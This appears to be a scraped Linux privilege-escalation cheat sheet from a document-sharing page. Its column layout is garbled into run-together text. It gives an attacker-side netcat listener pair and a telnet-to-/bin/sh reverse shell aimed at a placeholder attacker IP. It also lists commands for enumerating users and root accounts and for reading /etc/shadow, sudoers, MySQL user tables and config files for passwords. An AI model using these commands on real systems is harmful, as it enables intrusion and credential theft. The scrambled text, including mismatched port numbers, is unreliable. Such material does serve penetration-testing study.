Professional Documents
Culture Documents
Privesc
Privesc
Have you got a shell? Can Confidential Information & Users Who are you? Who is logged in?
you interact with the Who has been logged in? Who else is there? Who can do what?
system? id
who Are there any passwords in; scripts,
nc -lvp 4444 # Attacker. Input (Commands) w
nc -lvp 4445 # Attacker. Ouput (Results) last databases, configuration files or log
telnet [attackers ip] 44444 | /bin/sh | [local ip] cat /etc/passwd | cut -d: -f1
44445 # On the targets system. Use the attackers # List of users files? Default paths and locations for
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
IP!
# List of super users passwords
awk -F: '($3 == "0") {print}' /etc/passwd
What sensitive files can be # List of super users cat /var/apache2/config.inc
cat /etc/sudoers sudo -l cat /var/lib/mysql/mysql/user.MYD
found? cat /root/anaconda-ks.cfg
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
@Aacle_